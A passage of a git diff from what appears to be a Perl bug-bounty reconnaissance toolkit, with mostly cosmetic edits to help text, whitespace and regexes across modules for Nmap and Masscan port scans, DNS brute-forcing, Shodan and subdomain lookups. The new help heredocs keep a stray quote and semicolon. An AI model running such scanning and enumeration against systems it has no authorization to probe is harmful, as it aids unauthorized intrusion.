- \r--save Save the output on some attribute\n\n";
+ return<<"EOT";
+
+Helper::Scope
+=====================
+-h, --help See this menu
+-S, --scope Define a YML file as a scope
+-i, --information Set an information to extract from your scope
+-e, --entrypoint Send informations to another entrypoint module
+-K, --keep Keep the current values in the file and add news values
+--save Save the output on some attribute\n\n";
+
+EOT
}
-
+
return 0;
}
}
diff --git a/lib/Spellbook/Helper/Uniq.pm b/lib/Spellbook/Helper/Uniq.pm
index d4f81a2..7541696 100644
--- a/lib/Spellbook/Helper/Uniq.pm
+++ b/lib/Spellbook/Helper/Uniq.pm
@@ -17,11 +17,14 @@ package Spellbook::Helper::Uniq {
}
if ($help) {
- return "
- \rHelper::Uniq
- \r=====================
- \r-h, --help See this menu
- \r-v, --target Define a value\n\n";
+ return<<"EOT";
+
+Helper::Uniq
+=====================
+-h, --help See this menu
+-v, --target Define a value\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Parser/Nmap.pm b/lib/Spellbook/Parser/Nmap.pm
index 6127b7b..2f464f0 100644
--- a/lib/Spellbook/Parser/Nmap.pm
+++ b/lib/Spellbook/Parser/Nmap.pm
@@ -2,7 +2,7 @@ package Spellbook::Parser::Nmap {
use strict;
use warnings;
use XML::Simple;
-
+
# https://metacpan.org/pod/Nmap::Parser
sub new {
@@ -18,14 +18,14 @@ package Spellbook::Parser::Nmap {
if ($file) {
my $xml = XML::Simple -> new();
my $data = $xml -> XMLin($file);
-
+
my $host = $data -> {host} -> {address} -> {addr};
-
+
# foreach my $content (@{$data -> {host} -> {ports} -> {port}}) {
# print Dumper($content);
# push @result, $element -> {Key};
# }
-
+
# my $state = $content -> {state} -> {state};
# if (($state eq "open") || ($state eq "filtered")) {
@@ -36,16 +36,19 @@ package Spellbook::Parser::Nmap {
# push @results, "$host -> [$protocol] | [$state]-> $port \t | $service\n";
# }
# };
-
+
return @results;
}
if ($help) {
- return "
- \rParser::Nmap
- \r=====================
- \r-h, --help See this menu
- \r-f, --file Set an XML file from Nmap output\n\n";
+ return<<"EOT";
+
+Parser::Nmap
+=====================
+-h, --help See this menu
+-f, --file Set an XML file from Nmap output\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Parser/Nozaki.pm b/lib/Spellbook/Parser/Nozaki.pm
index 36f9551..fed200a 100644
--- a/lib/Spellbook/Parser/Nozaki.pm
+++ b/lib/Spellbook/Parser/Nozaki.pm
@@ -25,11 +25,14 @@ package Spellbook::Parser::Nozaki {
}
if ($help) {
- return "
- \rParser::Nozaki
- \r=====================
- \r-h, --help See this menu
- \r-t, --target \n\n";
+ return<<"EOT";
+
+Parser::Nozaki
+=====================
+-h, --help See this menu
+-t, --target \n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Parser/S3_Bucket.pm b/lib/Spellbook/Parser/S3_Bucket.pm
index acdd4aa..16288ba 100644
--- a/lib/Spellbook/Parser/S3_Bucket.pm
+++ b/lib/Spellbook/Parser/S3_Bucket.pm
@@ -16,10 +16,10 @@ package Spellbook::Parser::S3_Bucket {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
- $target = "https://$target";
+ if ($target !~ /^http(?:s)?:\/\//x) {
+ $target = "https://$target";
}
-
+
if ($target !~ /\/$/x) { $target .= "/"; }
my $userAgent = Spellbook::Core::UserAgent -> new();
@@ -35,16 +35,19 @@ package Spellbook::Parser::S3_Bucket {
}
}
}
-
+
return @result;
}
if ($help) {
- return "
- \rParser::Bucket
- \r=====================
- \r-h, --help See this menu
- \r-t, --target \n\n";
+ return<<"EOT";
+
+Parser::Bucket
+=====================
+-h, --help See this menu
+-t, --target \n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Parser/Sitemap.pm b/lib/Spellbook/Parser/Sitemap.pm
index 8ffb154..48c2ad7 100644
--- a/lib/Spellbook/Parser/Sitemap.pm
+++ b/lib/Spellbook/Parser/Sitemap.pm
@@ -15,7 +15,7 @@ package Spellbook::Parser::Sitemap {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; }
+ if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; }
if ($target !~ /\/sitemap.xml$/x) { $target = "$target/sitemap.xml"; }
my $userAgent = Spellbook::Core::UserAgent -> new();
@@ -33,16 +33,19 @@ package Spellbook::Parser::Sitemap {
}
}
}
-
+
return @result;
}
if ($help) {
- return "
- \rParser::Sitemap
- \r=====================
- \r-h, --help See this menu
- \r-t, --target \n\n";
+ return<<"EOT";
+
+Parser::Sitemap
+=====================
+-h, --help See this menu
+-t, --target \n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Platform/HackerOne.pm b/lib/Spellbook/Platform/HackerOne.pm
index 003a6a6..739fa84 100644
--- a/lib/Spellbook/Platform/HackerOne.pm
+++ b/lib/Spellbook/Platform/HackerOne.pm
@@ -18,7 +18,7 @@ package Spellbook::Platform::HackerOne {
);
my $token = Spellbook::Core::Credentials -> new(["--platform" => "hackerone"]);
-
+
if ($token && $target) {
my $useragent = Spellbook::Core::UserAgent -> new();
my $api_url = "https://api.hackerone.com/v1/hackers/programs/$target";
@@ -35,7 +35,7 @@ package Spellbook::Platform::HackerOne {
for my $scope (@{$data -> {"relationships"} -> {"structured_scopes"} -> {"data"}}) {
if (($scope -> {"attributes"} -> {"asset_type"} eq "URL") && ($scope -> {"attributes"} -> {"eligible_for_bounty"})) {
my $url = $scope -> {"attributes"} -> {"asset_identifier"};
-
+
push @result, Spellbook::Helper::Host_Normalization -> new(["--target" => $url]);
}
}
@@ -45,15 +45,18 @@ package Spellbook::Platform::HackerOne {
}
if ($help) {
- return "
- \rPlatform::HackerOne
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Program handle from HackerOne\n\n";
+ return<<"EOT";
+
+Platform::HackerOne
+=====================
+-h, --help See this menu
+-t, --target Program handle from HackerOne\n\n";
+
+EOT
}
return 0;
}
-}
+}
1;
\ No newline at end of file
diff --git a/lib/Spellbook/Platform/Intigriti.pm b/lib/Spellbook/Platform/Intigriti.pm
index 4db7ac1..8c049c3 100644
--- a/lib/Spellbook/Platform/Intigriti.pm
+++ b/lib/Spellbook/Platform/Intigriti.pm
@@ -5,10 +5,13 @@ package Spellbook::Platform::Intigriti {
sub new {
my ($self, $parameters) = @_;
- return "
- \rPlatform::Intigriti
- \r===================
- \rThis module is under development\n\n";
+ return<<"EOT";
+
+Platform::Intigriti
+===================
+This module is under development\n\n";
+
+EOT
}
}
diff --git a/lib/Spellbook/Recon/DNS_Bruteforce.pm b/lib/Spellbook/Recon/DNS_Bruteforce.pm
index 22c74f0..34d3a1c 100644
--- a/lib/Spellbook/Recon/DNS_Bruteforce.pm
+++ b/lib/Spellbook/Recon/DNS_Bruteforce.pm
@@ -22,7 +22,7 @@ package Spellbook::Recon::DNS_Bruteforce {
if (@file) {
foreach my $line (@file) {
my $return = Spellbook::Recon::Host_Resolv -> new (["--target" => "$line.$target"]);
-
+
if ($return) {
push @result, "$line.$target";
}
@@ -31,14 +31,17 @@ package Spellbook::Recon::DNS_Bruteforce {
return @result;
}
-
+
if ($help) {
- return "
- \rRecon::DNS_Bruteforce
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Set a domain as a target
- \r-f, --file Define a wordlist\n\n";
+ return<<"EOT";
+
+Recon::DNS_Bruteforce
+=====================
+-h, --help See this menu
+-t, --target Set a domain as a target
+-f, --file Define a wordlist\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Recon/Detect_Error.pm b/lib/Spellbook/Recon/Detect_Error.pm
index 56ce245..987405d 100644
--- a/lib/Spellbook/Recon/Detect_Error.pm
+++ b/lib/Spellbook/Recon/Detect_Error.pm
@@ -16,7 +16,7 @@ package Spellbook::Recon::Detect_Error {
if ($target) {
$target =~ s/^http(s)?:\/\///x;
-
+
my $resolv = Net::DNS::Resolver -> new();
my $reply = $resolv -> search($target);
@@ -30,7 +30,7 @@ package Spellbook::Recon::Detect_Error {
if ($request -> code() == 404) {
push @results, $target;
- }
+ }
}
}
}
@@ -39,11 +39,14 @@ package Spellbook::Recon::Detect_Error {
}
if ($help) {
- return "
- \rChecker
- \r==============
- \r-h, --help See this menu
- \r-t, --target Define a target\n\n";
+ return<<"EOT";
+
+Checker
+==============
+-h, --help See this menu
+-t, --target Define a target\n\n";
+
+EOT
}
}
}
diff --git a/lib/Spellbook/Recon/Dorking.pm b/lib/Spellbook/Recon/Dorking.pm
index a3bbd8a..1302d64 100644
--- a/lib/Spellbook/Recon/Dorking.pm
+++ b/lib/Spellbook/Recon/Dorking.pm
@@ -20,11 +20,13 @@ package Spellbook::Recon::Dorking {
}
if ($help) {
- return "
- \rRecon::Dorking
- \r=====================
- \r-h, --help See this menu
- \r \n\n";
+ return<<"EOT";
+
+Recon::Dorking
+=====================
+-h, --help See this menu\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Recon/Extract_Links.pm b/lib/Spellbook/Recon/Extract_Links.pm
index 3fb8bde..46b6c1a 100755
--- a/lib/Spellbook/Recon/Extract_Links.pm
+++ b/lib/Spellbook/Recon/Extract_Links.pm
@@ -22,7 +22,7 @@ package Spellbook::Recon::Extract_Links {
ssl_opts => { verify_hostname => 0 }
);
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
@@ -30,12 +30,12 @@ package Spellbook::Recon::Extract_Links {
my $request = $mech -> get($target);
my @links = $mech -> links();
-
+
for my $link (@links) {
my $url = $link -> url();
- if (($url) && ($url !~ m/#/x) && ($url !~ /^http(s)?:\/\//x)) {
- if ($url !~ /^\//x) {
+ if (($url) && ($url !~ m/#/x) && ($url !~ /^http(?:s)?:\/\//x)) {
+ if ($url !~ /^\//x) {
$url = "/" . $url;
}
@@ -57,12 +57,15 @@ package Spellbook::Recon::Extract_Links {
}
if ($help) {
- return "
- \rRecon::Extrac_Links
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Define a web page to extract all links
- \r-d, --deep Draft recursive function\n\n";
+ return<<"EOT";
+
+Recon::Extrac_Links
+=====================
+-h, --help See this menu
+-t, --target Define a web page to extract all links
+-d, --deep Draft recursive function\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Recon/Find_Emails.pm b/lib/Spellbook/Recon/Find_Emails.pm
index f1d9a38..21674e0 100644
--- a/lib/Spellbook/Recon/Find_Emails.pm
+++ b/lib/Spellbook/Recon/Find_Emails.pm
@@ -30,15 +30,18 @@ package Spellbook::Recon::Find_Emails {
}
return @result;
- }
+ }
}
if ($help) {
- return "
- \rRecon::Find_Emails
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Define a domain to find emails\n";
+ return<<"EOT";
+
+Recon::Find_Emails
+=====================
+-h, --help See this menu
+-t, --target Define a domain to find emails\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Recon/Get_IP.pm b/lib/Spellbook/Recon/Get_IP.pm
index e6eb2ad..e3f8533 100644
--- a/lib/Spellbook/Recon/Get_IP.pm
+++ b/lib/Spellbook/Recon/Get_IP.pm
@@ -22,15 +22,18 @@ package Spellbook::Recon::Get_IP {
if ($ip) {
return inet_ntoa($ip);
- }
+ }
}
if ($help) {
- return "
- \rRecon::Get_IP
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Set a domain to get the IP\n\n";
+ return<<"EOT";
+
+Recon::Get_IP
+=====================
+-h, --help See this menu
+-t, --target Set a domain to get the IP\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Recon/HTTP_Probe.pm b/lib/Spellbook/Recon/HTTP_Probe.pm
index 49e9467..ee5e606 100644
--- a/lib/Spellbook/Recon/HTTP_Probe.pm
+++ b/lib/Spellbook/Recon/HTTP_Probe.pm
@@ -14,14 +14,14 @@ package Spellbook::Recon::HTTP_Probe {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "http://$target";
}
my $userAgent = Spellbook::Core::UserAgent -> new();
my $response = $userAgent -> get($target);
- if ($response -> code() != 500) {
+ if ($response -> code() != 500) {
push @result, $target;
}
@@ -29,11 +29,14 @@ package Spellbook::Recon::HTTP_Probe {
}
if ($help) {
- return "
- \rRecon::HTTP_Probe
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Define a target to make a HTTP request probe\n\n";
+ return<<"EOT";
+
+Recon::HTTP_Probe
+=====================
+-h, --help See this menu
+-t, --target Define a target to make a HTTP request probe\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Recon/HaveBeenPwned.pm b/lib/Spellbook/Recon/HaveBeenPwned.pm
index b2c5adf..1621406 100644
--- a/lib/Spellbook/Recon/HaveBeenPwned.pm
+++ b/lib/Spellbook/Recon/HaveBeenPwned.pm
@@ -6,7 +6,7 @@ package Spellbook::Recon::HaveBeenPwned {
use Spellbook::Core::Credentials;
# THIS IS A DRAFT MODULE
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $target);
@@ -33,11 +33,14 @@ package Spellbook::Recon::HaveBeenPwned {
}
if ($help) {
- return "
- \rRecon::HaveBeenPwned
- \r====================
- \r-h, --help See this menu
- \r-e, --target Define an e-mail address as a target\n\n";
+ return<<"EOT";
+
+Recon::HaveBeenPwned
+====================
+-h, --help See this menu
+-e, --target Define an e-mail address as a target\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Recon/Host_Resolv.pm b/lib/Spellbook/Recon/Host_Resolv.pm
index 7a79ac0..8de4dde 100644
--- a/lib/Spellbook/Recon/Host_Resolv.pm
+++ b/lib/Spellbook/Recon/Host_Resolv.pm
@@ -23,15 +23,18 @@ package Spellbook::Recon::Host_Resolv {
if ($search) {
return $target;
- }
+ }
}
-
+
if ($help) {
- return "
- \rRecon::Host_Resolv
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Set a domain to get the IP\n\n";
+ return<<"EOT";
+
+Recon::Host_Resolv
+=====================
+-h, --help See this menu
+-t, --target Set a domain to get the IP\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Recon/Internal_DNS.pm b/lib/Spellbook/Recon/Internal_DNS.pm
index 9dabb96..79a3622 100644
--- a/lib/Spellbook/Recon/Internal_DNS.pm
+++ b/lib/Spellbook/Recon/Internal_DNS.pm
@@ -26,11 +26,14 @@ package Spellbook::Recon::Internal_DNS {
}
if ($help) {
- return "
- \rRecon::Internal_DNS
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Set a domain to get the IP\n\n";
+ return<<"EOT";
+
+Recon::Internal_DNS
+=====================
+-h, --help See this menu
+-t, --target Set a domain to get the IP\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Recon/Masscan.pm b/lib/Spellbook/Recon/Masscan.pm
index 205742c..d460388 100644
--- a/lib/Spellbook/Recon/Masscan.pm
+++ b/lib/Spellbook/Recon/Masscan.pm
@@ -5,11 +5,11 @@ package Spellbook::Recon::Masscan {
use List::MoreUtils qw(uniq);
use Spellbook::Recon::Get_IP;
use Spellbook::Helper::CDN_Checker;
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, @target, @ports, @result, $skip_cdn);
-
+
my @arguments = qw(--banners);
Getopt::Long::GetOptionsFromArray (
@@ -19,7 +19,7 @@ package Spellbook::Recon::Masscan {
"p|port=s" => \@ports,
"a|arguments" => \@arguments,
"skip-cdn" => \$skip_cdn
- );
+ );
if (@target) {
if (!@ports) { @ports = "1-65535"; }
@@ -28,7 +28,7 @@ package Spellbook::Recon::Masscan {
my $CDN_Checker = Spellbook::Helper::CDN_Checker -> new (["--target" => $target[0]]);
if ($CDN_Checker) {
- return 0;
+ return 0;
}
}
@@ -45,23 +45,26 @@ package Spellbook::Recon::Masscan {
if ($scan) {
my $result = $masscan -> scan_results();
- foreach my $value (@{$result -> {"scan_results"}}) {
+ foreach my $value (@{$result -> {"scan_results"}}) {
push @result, $target[0] . ":" . $value -> {"ports"} -> [0] -> {"port"};
}
-
+
return uniq @result;
}
- }
+ }
if ($help) {
- return "
- \rRecon::Masscan
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Set an Domain/IP to make a port scanning using masscan
- \r-p, --ports Define ports to scan
- \r-a, --arguments Parameters to masscanner
- \r--skip-cdn Skip the CDN check\n\n";
+ return<<"EOT";
+
+Recon::Masscan
+=====================
+-h, --help See this menu
+-t, --target Set an Domain/IP to make a port scanning using masscan
+-p, --ports Define ports to scan
+-a, --arguments Parameters to masscanner
+--skip-cdn Skip the CDN check\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Recon/Nmap_Scanner.pm b/lib/Spellbook/Recon/Nmap_Scanner.pm
index 23ea636..15278ad 100644
--- a/lib/Spellbook/Recon/Nmap_Scanner.pm
+++ b/lib/Spellbook/Recon/Nmap_Scanner.pm
@@ -2,28 +2,28 @@ package Spellbook::Recon::Nmap_Scanner {
use strict;
use warnings;
use Nmap::Scanner; # https://metacpan.org/pod/Nmap::Scanner
-
+
sub scan_started {
my $self = shift;
my $host = shift;
-
+
my $hostname = $host -> hostname();
my $addresses = join(',', map {$_ -> addr()} $host -> addresses());
my $status = $host -> status();
-
+
print "$hostname ($addresses) is $status\n";
return 0;
}
-
+
sub port_found {
my $self = shift;
my $host = shift;
my $port = shift;
-
+
my $name = $host->hostname();
my $addresses = join(',', map {$_ -> addr()} $host -> addresses());
-
+
print "On host $name ($addresses), found ",
$port->state()," port ",
join('/', $port -> protocol(), $port -> portid()), "\n";
@@ -48,20 +48,23 @@ package Spellbook::Recon::Nmap_Scanner {
$scanner -> register_scan_started_event(\&scan_started);
$scanner -> register_port_found_event(\&port_found);
$scanner -> scan("-sS -p 1-1024 -O $target");
-
+
my $results = $scanner -> scan();
# print Dumper($results);
return @result;
- }
+ }
if ($help) {
- return "
- \rRecon::Nmap_Scanner
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Set an IP to run the scanner\n\n";
+ return<<"EOT";
+
+Recon::Nmap_Scanner
+=====================
+-h, --help See this menu
+-t, --target Set an IP to run the scanner\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Recon/Query_Shodan.pm b/lib/Spellbook/Recon/Query_Shodan.pm
index b4453c2..0b109b0 100644
--- a/lib/Spellbook/Recon/Query_Shodan.pm
+++ b/lib/Spellbook/Recon/Query_Shodan.pm
@@ -24,7 +24,7 @@ package Spellbook::Recon::Query_Shodan {
if ($httpCode == 200) {
my $content = decode_json($request -> content());
-
+
foreach my $data (@{$content -> {"matches"}}) {
my $hostname = $data -> {"ip_str"};
my $port = $data -> {"port"};
@@ -37,11 +37,14 @@ package Spellbook::Recon::Query_Shodan {
}
if ($help) {
- return "
- \rRecon::Shodan
- \r=====================
- \r-h, --help See this menu
- \r-t, --query Define a query\n\n";
+ return<<"EOT";
+
+Recon::Shodan
+=====================
+-h, --help See this menu
+-t, --query Define a query\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Recon/Shodan_Enumeration.pm b/lib/Spellbook/Recon/Shodan_Enumeration.pm
index d8edb03..bd02dae 100644
--- a/lib/Spellbook/Recon/Shodan_Enumeration.pm
+++ b/lib/Spellbook/Recon/Shodan_Enumeration.pm
@@ -21,7 +21,7 @@ package Spellbook::Recon::Shodan_Enumeration {
if ($target =~ /^http(s)?:\/\//x) {
$target =~ s/^http(s)?:\/\///x;
}
-
+
my $validate = is_domain($target);
if ($validate) {
@@ -61,11 +61,14 @@ package Spellbook::Recon::Shodan_Enumeration {
}
if ($help) {
- return "
- \rRecon::Shodan_Enum
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Set an IP to see infos on shodan API\n\n";
+ return<<"EOT";
+
+Recon::Shodan_Enum
+=====================
+-h, --help See this menu
+-t, --target Set an IP to see infos on shodan API\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Recon/Subdomain_Enumeration.pm b/lib/Spellbook/Recon/Subdomain_Enumeration.pm
index 1d06c66..2bcd126 100644
--- a/lib/Spellbook/Recon/Subdomain_Enumeration.pm
+++ b/lib/Spellbook/Recon/Subdomain_Enumeration.pm
@@ -5,7 +5,7 @@ package Spellbook::Recon::Subdomain_Enumeration {
use List::MoreUtils qw(uniq);
use Spellbook::Core::UserAgent;
use Spellbook::Core::Credentials;
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $target, @result);
@@ -50,14 +50,17 @@ package Spellbook::Recon::Subdomain_Enumeration {
}
return uniq @result;
- }
+ }
if ($help) {
- return "
- \rRecon::Subdomain_Enumeration
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Find subdomains from a target using SecurityTrails\n\n";
+ return<<"EOT";
+
+Recon::Subdomain_Enumeration
+=====================
+-h, --help See this menu
+-t, --target Find subdomains from a target using SecurityTrails\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Recon/Technologies.pm b/lib/Spellbook/Recon/Technologies.pm
index 0801727..1f411df 100644
--- a/lib/Spellbook/Recon/Technologies.pm
+++ b/lib/Spellbook/Recon/Technologies.pm
@@ -16,7 +16,7 @@ package Spellbook::Recon::Technologies {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
@@ -36,11 +36,14 @@ package Spellbook::Recon::Technologies {
}
if ($help) {
- return "
- \rRecon::Detect_Tech
- \r=====================
- \r-t, --target Define the target
- \r-h, --help See this menu\n\n";
+ return<<"EOT";
+
+Recon::Detect_Tech
+=====================
+-t, --target Define the target
+-h, --help See this menu\n\n";
+
+EOT
}
return 1;
diff --git a/lib/Spellbook/Recon/WayBackUrls.pm b/lib/Spellbook/Recon/WayBackUrls.pm
index ffce702..d78d397 100644
--- a/lib/Spellbook/Recon/WayBackUrls.pm
+++ b/lib/Spellbook/Recon/WayBackUrls.pm
@@ -3,7 +3,7 @@ package Spellbook::Recon::WayBackUrls {
use warnings;
use JSON;
use Spellbook::Core::UserAgent;
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $target, @result);
@@ -14,11 +14,11 @@ package Spellbook::Recon::WayBackUrls {
"t|target=s" => \$target
);
- if ($target) {
+ if ($target) {
my $endpoint = "http://web.archive.org/cdx/search/cdx?url=$target/*&output=json&collapse=urlkey";
my $userAgent = Spellbook::Core::UserAgent -> new();
my $request = $userAgent -> get($endpoint);
-
+
if (($request -> code() == 200) && ($request -> content ne "[]")) {
my $content = decode_json($request -> content);
@@ -33,11 +33,14 @@ package Spellbook::Recon::WayBackUrls {
}
if ($help) {
- return "
- \rRecon::WaybackUrls
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Set an website to see paths from WayBackMachine\n";
+ return<<"EOT";
+
+Recon::WaybackUrls
+=====================
+-h, --help See this menu
+-t, --target Set an website to see paths from WayBackMachine\n";
+
+EOT
}
return 0;
diff --git a/spellbook.pl b/spellbook.pl
index fcef7a0..b1792da 100755
--- a/spellbook.pl
+++ b/spellbook.pl
@@ -11,7 +11,7 @@
sub main {
my ($search, $module, @result);
-
+
Getopt::Long::GetOptions (
"s|search=s" => \$search,
"m|module=s" => \$module
@@ -25,6 +25,8 @@ sub main {
}
return Spellbook::Core::Helper -> new() unless $search || $module;
+
+ return 0;
}
main();
\ No newline at end of file